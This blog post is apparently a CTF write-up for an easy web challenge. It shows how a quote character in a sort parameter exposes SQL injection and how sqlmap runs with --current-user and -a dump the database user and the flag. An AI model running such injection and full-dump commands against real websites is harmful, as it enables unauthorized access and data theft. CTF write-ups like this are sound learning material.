2019 Stonecutters - Easy Drinking Duff

Easy Drinking Duff was the first and easiest web app challenge that the Stonecutters had on the board. By the time I got around to it, it was only worth 75 points and it had the most solves of all the web app challenges.

In order to access the challenge, I needed to register my SSH key with the scoring server and run a provided SSH command to access the challenge. I was then able to load the following site by pointing my browser to

Easy Drinking Duff

I then sorted the data set by year by clicking on the "Year" column header which sent a request for:

This just screamed database, so I entered a ' at the end of year to see what would happen and I saw the following error message:

SQL Error

This indicated a SQLi vulnerability so I ran sqlmap, as seen below, to validate the finding by checking who the current-user was:

# sqlmap -u "*" --current-user
[13:57:38] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.2.3
back-end DBMS: MySQL >= 5.0
[13:57:38] [INFO] fetching current user
[13:57:38] [INFO] retrieved: ctf@localhost
current user: 'ctf@localhost'
[13:57:38] [INFO] fetched data logged to text files under '/root/.sqlmap/output/'

As the injection vulnerability was confirmed, I then ran sqlmap again with the -a option so I could check for flags:

# sqlmap -u "*" -a
[13:58:11] [INFO] retrieved: Artist Test
[13:58:11] [INFO] retrieved: 0
[13:58:11] [INFO] retrieved: flag{OttoMannWasHere}

That was it for this challenge. I'm excited to share the rest of my write-ups when I'm allowed. Rumor has it that the Stonecutters will release new challenges relatively soon. This means I should get the green-light to post my other write-ups shortly thereafter.

Thanks for your patience!

The rest of the challenges can be found here:


Popular posts from this blog

The Audacity of Some CTFs

A Primer for On-Site CTFs

2019 Stonecutters - Bleeding Gums